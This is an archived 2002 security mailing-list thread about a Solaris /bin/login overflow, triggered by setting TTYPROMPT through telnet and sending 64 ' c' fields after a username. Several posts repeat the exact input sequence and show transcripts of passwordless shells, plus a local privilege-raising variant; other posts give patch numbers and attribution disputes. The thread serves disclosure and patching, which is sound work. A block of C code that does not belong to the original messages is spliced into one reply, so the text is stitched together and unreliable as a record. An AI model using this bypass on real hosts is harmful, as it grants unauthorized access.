Re: Solaris 2.6, 7, 8

2002-10-05 Thread Sebastian


Hi.


On Wed, Oct 02, 2002 at 12:00:38PM -0400, buzheng wrote:

> But, the remote setting of TTYPROMPT does matter. you can not succeed in
> login without remotely changing the TTYPROMPT. This is also the bug
> mentioned in Jonathan's original letter (bid:5531).
 
Which is plain wrong. This may be true for the 64 times " c" method, but in
the generic case it does not matter.

The second bug in login, where login walks out of a 64 (char *) array can be
exploited remotely to gain root privileges even if you cannot login as root
legally and even if you do not touch TTYPROMPT at all.


> If you have applied patches for these 2 bugs, you are safe now.
 
And everybody should have done so since November 2001.


> -- 
> bu,zheng <[EMAIL PROTECTED]>
 
ciao,
Sebastian

-- 
-. [EMAIL PROTECTED] -. + http://segfault.net/~scut/ `.
-' segfault.net/~scut/pgp `' 5453 AC95 1E02 FDA7 50D2 A42D 427E 6DEF 745A 8E07
`- project grasp infiltrated, phantom works falling. hi echelon! '



RE: Solaris 2.6, 7, 8

2002-10-04 Thread Morgan

This is nothing more than a newly disclosed way of exploiting an old
bug, hardly newsworthy unless you're in the dot slash hacking business.  In
the spirit of giving credit where credit is due, I'd like to note that the
bug was originally found by duke (ISS/ADM) of course. This method of
exploitation, to the best of my knowledge, was first used by brian
mcwilliams (bmcw@AOLIM).
This is very similar to how I exploited it, but instead of using fflag
to force auth, I used malloc.  The problem is in the getargs function inside
login, which is called in multiple places.  A buffer is parsed into a static
char pointer array of size 64. Whitespace is a separator, and no bounds
checking is done. Patch has been available for a long time, but you don't
need it if you use ISS IDS, because you are automatically protected
according to ISS's statement:
>ISS RealSecure Network Sensor customers are currently protected from
>this vulnerability. Support for this issue was included in X-Press
>Update version 3.3 as the "TelnetExcessiveTabs" signature. This
>signature will be included in the next RealSecure Server Sensor.

>ISS Internet Scanner X-Press Update 6.1 for Internet Scanner version
>6.2.1 included support for this issue with the TelnetTabBO check.

>ISS BlackICE customers are protected from this vulnerability by the
>"2000902 Telnet login name overflow" signature.

original findings by duke:
http://xforce.iss.net/alerts/advise105.php

my exploit:
http://archives.neohapsis.com/archives/bugtraq/2002-03/0218.html






Re: Solaris 2.6, 7, 8

2002-10-03 Thread Gert-Jan Hagenaars

Apparently, Dave Ahmad wrote:
% 
% These may be fixes for this vulnerability, however they apply to telnetd
% and this vulnerability has to be in login.

So it makes more sense to apply the right patches to login, and not
patches to telnetd.  If you only want to install the necessary patches
to plug this specific hole, very quickly, use these:

solaris 8 login fix: 111085-02
solaris 7 login fix: 112300-01
solaris 2.6 login fix: 105665-04
solaris 2.5.1 login fix: 106160-02

use patchadd.  A reboot is not necessary.

During your normal maintenance window you should install the rest of the
recommended patches.

Cheers,
Gert-Jan.

-- 
+  + --- ++ - +0+ + ++ +++ +  +
sed '/^[when][coders]/!d      G.J.W. Hagenaars -- gj at hagenaars dot com
     /^...[discover].$/d      Remembering Mike Carty 1968-1994
     /^..[real].[code]$/!d    UltrixIrixAIXHPUXSunOSLinuxBSD, nothing but nix
     ' /usr/dict/words        I'm Dutch, what's _your_ excuse?



Re: Solaris 2.6, 7, 8

2002-10-03 Thread Ramon Kagan

Another thing,  if you tcpwrap your telnet sessions, you can prevent
localhost telnets.

Ramon Kagan
York University, Computing and Network Services
Unix Team -  Intermediate System Administrator
(416)736-2100 #20263
[EMAIL PROTECTED]

-
I have not failed.  I have just
found 10,000 ways that don't work.
- Thomas Edison
-

On Wed, 2 Oct 2002, Jonathan S wrote:

> Hello,
>
>   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT.  This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
>   However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists.  The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6 character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n".  You will then be logged in as the user
> without any password authentication.  This should work with any account
> except root (unless remote root login is allowed).
>
> Example:
>
> coma% telnet
> telnet> environ define TTYPROMPT abcdef
> telnet> o localhost
>
> SunOS 5.8
>
> bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
> Last login: whenever
> $ whoami
> bin
>
> Jonathan Stuart
> Network Security Engineer
> Computer Consulting Partners, Ltd.
> E-mail: [EMAIL PROTECTED]
>
>




Re: Solaris 2.6, 7, 8

2002-10-03 Thread Marco Ivaldi

On Wed, 2 Oct 2002, buzheng wrote:

> I do not think this is a new bug.

I completely agree.

> But, the remote setting of TTYPROMPT does matter. you can not succeed in
> login without remotely changing the TTYPROMPT. This is also the bug
> mentioned in Jonathan's original letter (bid:5531).

That's why this bug is not exploitable using remote applications like
rlogin, ssh (at least if you are not crazy enough to enable the UseLogin
option) or X.25 pad: rlogin and pad aren't able to pass env vars other
than TERM, while ssh normally doesn't use /bin/login for user authentication.

> If you have applied patches for these 2 bugs, you are safe now.
>
> BTW: you can change multiple "c "s to "a=b"s, actually, since SYS V
> login treat " " as environ var separator, you can also use >=64 words
> separated by " " or "\t". they will all work.

Agreed as well.

:raptor
Antifork Research, Inc. ITBH Italian Black Hats
http://www.0xdeadbeef.eu.org    http://elite.blackhats.it





Re: Solaris 2.6, 7, 8

2002-10-03 Thread Ramon Kagan

Sorry but I can't reproduce this on a Solaris 7 machine.

sunlight.ccs% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.


SunOS 5.7

login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\nPassword:
Login incorrect


As you can see I get a request for a username/password.

Ramon Kagan
York University, Computing and Network Services
Unix Team -  Intermediate System Administrator
(416)736-2100 #20263
[EMAIL PROTECTED]

-
I have not failed.  I have just
found 10,000 ways that don't work.
- Thomas Edison
-

On Wed, 2 Oct 2002, Jonathan S wrote:

> Hello,
>
>   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT.  This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
>   However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists.  The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6 character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n".  You will then be logged in as the user
> without any password authentication.  This should work with any account
> except root (unless remote root login is allowed).
>
> Example:
>
> coma% telnet
> telnet> environ define TTYPROMPT abcdef
> telnet> o localhost
>
> SunOS 5.8
>
> bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
> Last login: whenever
> $ whoami
> bin
>
> Jonathan Stuart
> Network Security Engineer
> Computer Consulting Partners, Ltd.
> E-mail: [EMAIL PROTECTED]
>
>




Re: Solaris 2.6, 7, 8

2002-10-03 Thread Ido Dubrawsky

On Wed, Oct 02, 2002 at 12:13:09PM -0400, Jonathan S wrote:
> Hello,
> 
>   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT.  This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
>   However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists.  The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6 character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n".  You will then be logged in as the user
> without any password authentication.  This should work with any account
> except root (unless remote root login is allowed).
> 
Looks like Solaris 9 is not vulnerable to this:

[idubraws@elrond idubraws]
6 $ telnet
telnet> environ define TTYPROMPT abcdef
telnet> o 192.168.155.2
Trying 192.168.155.2...
Connected to 192.168.155.2.
Escape character is '^]'.


SunOS 5.9

login:


It automatically drops you to the login prompt.  Perhaps this is fixed by a 
patch that got rolled into 9?

Ido
-- 
===
|Ido Dubrawsky   E-mail: [EMAIL PROTECTED]
 |  |   |Network Consulting Engineer
:|::|:  |VSEC Technical Marketing, SAFE Architecture
   :|||:  :|||: |Cisco Systems, Inc.
.:|||:..:|||:.  |Austin, TX. 78759
===






Re: Solaris 2.6, 7, 8

2002-10-03 Thread Dan Diamond

In-Reply-To: <[EMAIL PROTECTED]>

This exploit can also be done locally to gain higher privs:
tester#TTYPROMPT=aa;export TTYPROMPT
tester#exec login
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c 
c c c c c c c c c c c c c c c/n
tester:bin#

Patches to resolve are:
2.6 105665-04
2.7 112300-01
2.8 111085-01



Re: Solaris 2.6, 7, 8

2002-10-03 Thread Roy Kidder

Works like a champ on Solaris 2.6/Sparc:


-- begin --

~ $ telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.


SunOS 5.6

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: Thu Oct  3 14:49:33 from localhost
Sun Microsystems Inc.   SunOS 5.6   Generic August 1997
You have new mail.
bin@ovcle$ uname -a
SunOS ovcle 5.6 Generic_105181-14 sun4u sparc SUNW,Ultra-4
bin@ovcle$ who am i 
bin        pts/6        Oct  3 15:05    (localhost)

-- begin --





On Wed, 2002-10-02 at 13:23, Ramon Kagan wrote:
> Sorry but I can't reproduce this on a Solaris 7 machine.
> 
> sunlight.ccs% telnet
> telnet> environ define TTYPROMPT abcdef
> telnet> o localhost
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
> 
> 
> SunOS 5.7
> 
> login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> c c c
> c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\nPassword:
> Login incorrect
> 
> 
> As you can see I get a request for a username/password.
> 
> Ramon Kagan
> York University, Computing and Network Services
> Unix Team -  Intermediate System Administrator
> (416)736-2100 #20263
> [EMAIL PROTECTED]
> 
> -
> I have not failed.  I have just
> found 10,000 ways that don't work.
>   - Thomas Edison
> -
> 
> On Wed, 2 Oct 2002, Jonathan S wrote:
> 
> > Hello,
> >
> >   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> > environment variable TTYPROMPT.  This vulnerability has already been
> > reported to BugTraq and a patch has been released by Sun.
> >   However, a very simple exploit, which does not require any code to be
> > compiled by an attacker, exists.  The exploit requires the attacker to
> > simply define the environment variable TTYPROMPT to a 6 character string,
> > inside telnet. I believe this overflows an integer inside login, which
> > specifies whether or not the user has been authenticated (just a guess).
> > Once connected to the remote host, you must type the username, followed by
> > 64 " c"s, and a literal "\n".  You will then be logged in as the user
> > without any password authentication.  This should work with any account
> > except root (unless remote root login is allowed).
> >
> > Example:
> >
> > coma% telnet
> > telnet> environ define TTYPROMPT abcdef
> > telnet> o localhost
> >
> > SunOS 5.8
> >
> > bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> > c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
> > Last login: whenever
> > $ whoami
> > bin
> >
> > Jonathan Stuart
> > Network Security Engineer
> > Computer Consulting Partners, Ltd.
> > E-mail: [EMAIL PROTECTED]
> >
> >
> 
-- 
===
Roy Kidder
Data Network Engineer
CoreComm
---
"...these products' frequent failures are 
legitimized by ubiquitous acquiescence." 
 -- Doc Searls on Microsoft products.
===




Re: Solaris 2.6, 7, 8

2002-10-03 Thread tb0b

On Wed, 02 Oct 2002, you wrote:
> But, the remote setting of TTYPROMPT does matter. you can not succeed in
> login without remotely changing the TTYPROMPT. This is also the bug
> mentioned in Jonathan's original letter (bid:5531).

I have heard several conflicting reports on this matter and there are at least
two published exploits for the Solaris login overflow (by [EMAIL PROTECTED] and
[EMAIL PROTECTED]) that do *not* explicitly set the TTYPROMPT environment
variable.

If someone (perhaps someone from Sun) could clarify this matter once and for all
I would be most grateful.

-tb0b

-- 
tb0b, Nietzschean.
No Religion. No Flag. No Phear.

http://bitterness.primitive-incision.co.uk/

   
   `Who said anything about cutting you up man?
I just wanted to carve a little `z' on your forehead.'
-Dr Gonzo, "Fear and Loathing in Las Vegas"
   



RE: Solaris 2.6, 7, 8

2002-10-02 Thread Sinan Eren


the problem is there exists an authentication flag called the "fflag" just after the
array that gets overflowed in the .bss segment. this is an array of char pointers, so
when it is overflowed because of a mismanagement of the indexing of this array, the
fflag gets overwritten with a valid address in the .bss segment. this is good enough to
satisfy the if(fflag) condition and spawn a shell.

some truth about this finding:
There is an exploit out in the wild for some time and the example pattern shown by
Jonathan is exactly the same as the payload of that exploit. so I'm curious about
this finding's origin, I think credits must be given where due... I'll be waiting for a
clarification from Mr. Stuart.

thanks,
sinan

-Original Message-
From: Jonathan S [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, October 02, 2002 9:13 AM
To: [EMAIL PROTECTED]
Subject: Solaris 2.6, 7, 8


Hello,

  Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
environment variable TTYPROMPT.  This vulnerability has already been
reported to BugTraq and a patch has been released by Sun.
  However, a very simple exploit, which does not require any code to be
compiled by an attacker, exists.  The exploit requires the attacker to
simply define the environment variable TTYPROMPT to a 6 character string,
inside telnet. I believe this overflows an integer inside login, which
specifies whether or not the user has been authenticated (just a guess).
Once connected to the remote host, you must type the username, followed by
64 " c"s, and a literal "\n".  You will then be logged in as the user
without any password authentication.  This should work with any account
except root (unless remote root login is allowed).

Example:

coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost

SunOS 5.8

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami
bin

Jonathan Stuart
Network Security Engineer
Computer Consulting Partners, Ltd.
E-mail: [EMAIL PROTECTED]
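
As an added illustration (not code from the thread, from Sun's login, or from any of the posters), a bounds-checked stand-in for the getargs tokenising step Morgan and Sinan describe, plus a read-only field counter of the kind an IDS signature would apply to the login-name line. The 64-slot array and the "bin c c ..." sample shape are taken from the thread; the function names, the 1024-byte buffer and the sample builder are my own.

```c
#include <ctype.h>
#include <stdio.h>

/* Size of the static (char *) array the thread says login's getargs() fills. */
#define MAXARGS 64

/* Bounds-checked stand-in for the tokenising step: splits `line` in place on
 * spaces/tabs into at most `maxargs` pointers and returns the field count, or
 * -1 when more fields arrive than fit. The unpatched routine had no such test,
 * so surplus fields were stored past the array into the flag that followed. */
int getargs_checked(char *line, char *args[], int maxargs)
{
    int n = 0;
    char *p = line;
    while (*p != '\0') {
        while (*p != '\0' && isspace((unsigned char)*p))
            p++;                        /* skip a run of separators */
        if (*p == '\0')
            break;
        if (n >= maxargs)
            return -1;                  /* refuse instead of overflowing */
        args[n++] = p;
        while (*p != '\0' && !isspace((unsigned char)*p))
            p++;                        /* advance to the end of this field */
        if (*p != '\0')
            *p++ = '\0';                /* terminate field, step past separator */
    }
    return n;
}

/* Read-only count of whitespace-separated fields in a captured login line. */
int count_fields(const char *line)
{
    int n = 0, in_field = 0;
    for (; *line != '\0'; line++) {
        if (isspace((unsigned char)*line))
            in_field = 0;
        else if (!in_field) { in_field = 1; n++; }
    }
    return n;
}

/* Flags a login name carrying MAXARGS or more fields, the ">=64 words" shape
 * reported in the thread; a legitimate login name is a single field. */
int suspicious_login_line(const char *line)
{
    return count_fields(line) >= MAXARGS;
}

/* Constructed sample (not captured traffic): "bin" followed by `ncopies` of
 * " c", the shape shown in the thread. Returns the checked parser's result. */
int parse_sample(int ncopies)
{
    char buf[1024], *args[MAXARGS];
    int i, len = snprintf(buf, sizeof buf, "bin");
    for (i = 0; i < ncopies && len + 3 < (int)sizeof buf; i++)
        len += snprintf(buf + len, sizeof buf - len, " c");
    return getargs_checked(buf, args, MAXARGS);
}
```

With 63 copies the 64 fields fit; the 64-copy line from the original post yields 65 fields and is refused, which is exactly the case the unpatched parser wrote past the array.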





Re: Solaris 2.6, 7, 8

2002-10-02 Thread Christopher X. Candreva

On Wed, 2 Oct 2002, Dave Ahmad wrote:

> I suggest that everyone here who still uses telnet disable it immediately.

 . . or install the latest Recommended patch cluster, which you should have
done anyway.

> These may be fixes for this vulnerability, however they apply to telnetd
> and this vulnerability has to be in login.

There are patches for /bin/login as well.  On Solaris 8 it's 111085-02, dated
Dec 13 2001.

I haven't been able to reproduce this on a system with 111085-02 installed.


==
Chris Candreva  -- [EMAIL PROTECTED] -- (914) 967-7816
WestNet Internet Services of Westchester
http://www.westnet.com/




Re: Solaris 2.6, 7, 8

2002-10-02 Thread buzheng

I do not think this is a new bug.

Actually, the overflow is not in changing the TTYPROMPT remotely.
In fact, if you just use "a", instead of "abcdef", as TTYPROMPT, it will
still work.
The overflow is in the long user name with multiple spaces: all the "c "s
will be taken as environment variables. It is the very bug of the SYS V derived
login buffer overflow, bid:3681.

But, the remote setting of TTYPROMPT does matter. You cannot succeed in
login without remotely changing the TTYPROMPT. This is also the bug
mentioned in Jonathan's original letter (bid:5531).

If you have applied patches for these 2 bugs, you are safe now.

BTW: you can change the multiple "c "s to "a=b"s; actually, since SYS V
login treats " " as the environment variable separator, you can also use >=64
words separated by " " or "\t". They will all work.

-- 
bu,zheng <[EMAIL PROTECTED]>



Re: Solaris 2.6, 7, 8

2002-10-02 Thread Dave Ahmad


I have confirmed this on a fresh Solaris 8/sparc install.

Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

SunOS 5.8

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
Last login: Wed Oct  2 10:47:12 from localhost
Sun Microsystems Inc.   SunOS 5.8   Generic February 2000
$ id
uid=2(bin) gid=2(bin)

I suggest that everyone here who still uses telnet disable it immediately.

These may be fixes for this vulnerability; however, they apply to telnetd,
and this vulnerability has to be in login.

Solaris 8: 110668-03
Solaris 8x86: 110669-03

Solaris 7: 107475-04
Solaris 7x86: 107476-04

Solaris 2.6: 106049-04
Solaris 2.6x86: 106050-04

Solaris 2.5.1: 103640-40
Solaris 2.5.1x86: 103641-40

If these are "band-aid" fixes that simply cause telnetd to not pass
TTYPROMPT to /bin/login, the setuid executable may still be exploitable
locally.

David Ahmad
Symantec
KeyID: 0x26005712
Fingerprint: 8D 9A B1 33 82 3D B3 D0 40 EB  AB F0 1E 67 C6 1A 26 00 57 12

On Wed, 2 Oct 2002, Jonathan S wrote:

> Hello,
>
>   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT.  This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
>   However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists.  The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6 character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n".  You will then be logged in as the user
> without any password authentication.  This should work with any account
> except root (unless remote root login is allowed).